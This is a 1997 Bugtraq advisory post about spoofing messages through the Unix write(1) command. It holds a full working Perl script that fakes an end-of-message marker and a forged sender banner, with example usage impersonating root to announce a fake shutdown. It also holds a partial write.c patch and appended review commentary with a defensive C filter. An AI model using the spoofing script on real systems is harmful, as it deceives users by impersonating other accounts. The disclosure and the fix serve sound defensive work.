Bugtraq mailing list archives
write(1)
From: butafuco () MC NET (test)
Date: Wed, 21 May 1997 21:53:30 -0500
Program Affected: write(1)
Impact: Mostly Harmless

It is trivial to spoof a write from one user to the next locally on a system by faking an "EOF". This of course does not affect users who have turned off their write permissions. It's also fairly noticeable by the lack of any beep.

-------------------------------swrite-----------------------------------------
#!/usr/contrib/bin/perl
# (NO C) intellectual property is theft... butafuco () mc net

if(@ARGV < 2) {
    print "\n Usage: swrite target from [tty]\n";
    exit 0;
}

while (<STDIN>){
    chop($line = $_);
    push @to_write, $line;
}

$oopsmessage = "oops... sorry :\)\n";
$wait = 30;
$delay = 2;
chop($host = `hostname`);
$terminal = "console";
if(@ARGV > 2){
    $terminal = $ARGV[2];
}

open(JIM, "|write $ARGV[0]");
select(JIM);
$| =1;
sleep $delay;
print(JIM $oopsmessage);
print(JIM "EOF\n");
sleep $wait;

chop($time = `date +%H:%M`);
print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");
foreach $line (@to_write){
    sleep $delay;
    print (JIM "$line\n");
}
$| = 0;
close(JIM);
-------------------------------swrite----------------------------------------

example usage...

Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \
user root console

If you're an absolute paranoid, here are the diffs of an incomplete patch for write.c.. it's a start anyhow.

281c281,284 < while (fgets(line, sizeof(line), stdin) != NULL) ---
while (fgets(line, sizeof(line), stdin) != NULL){ if(!strcmp(line, "EOF\n")){ (void)strcpy(line, "EOF <-- Warning: Not End of File.\n"); }
282a286
}
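Review bot: The strcmp(line, "EOF\n") test added inside the fgets loop matches only the exact line "EOF" followed by a newline, so an "EOF" line with a trailing space or tab still reaches the recipient looking like write's own end marker. Comparing after stripping trailing whitespace would close that gap, and the same loop could also flag lines that begin with "Message from", which the check does not look at. The strcpy of the warning text needs 35 bytes including the terminator; the declaration of line is not in the visible lines, so a bounded copy against sizeof(line) would be safer than assuming the buffer is large enough.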
It'll work for "EOF" just not for "EOF " or "EOF " etc...
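The gap noted above ("EOF" is caught, "EOF " is not) goes away if the comparison is made after trimming whitespace. The following is an added example, not part of the original post or of write.c; the function names and the "[sender typed]" marker are assumptions, and it goes one step further than the patch by also flagging lines that imitate the "Message from" banner.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example; function names and the marker text are assumptions. */

/* Length of s ignoring trailing whitespace (space, tab, CR, LF). */
static size_t trimmed_len(const char *s)
{
    size_t n = strlen(s);
    while (n > 0 && isspace((unsigned char)s[n - 1]))
        n--;
    return n;
}

/* 1 if the line would display like write's own "EOF" marker or banner. */
int looks_like_write_output(const char *line)
{
    while (*line == ' ' || *line == '\t')   /* leading blanks are invisible too */
        line++;
    if (trimmed_len(line) == 3 && strncmp(line, "EOF", 3) == 0)
        return 1;
    return strncmp(line, "Message from ", 13) == 0;
}

/* Rewrite a lookalike line in place so the recipient can tell the sender
 * typed it. Returns 1 if rewritten. snprintf truncates, never overflows. */
int neutralize_line(char *line, size_t size)
{
    char tmp[1024];

    if (!looks_like_write_output(line))
        return 0;
    snprintf(tmp, sizeof(tmp), "[sender typed] %.*s\n",
             (int)trimmed_len(line), line);
    snprintf(line, size, "%s", tmp);
    return 1;
}

int main(void)
{
    /* Constructed sample input: cases the strcmp patch catches and misses. */
    char lines[][80] = { "oops... sorry :)\n", "EOF\n", "EOF \n", "EOF\t\n",
                         "Message from root@host on console at 21:53 ...\n" };
    for (size_t i = 0; i < sizeof(lines) / sizeof(lines[0]); i++) {
        neutralize_line(lines[i], sizeof(lines[i]));
        fputs(lines[i], stdout);
    }
    return 0;
}
```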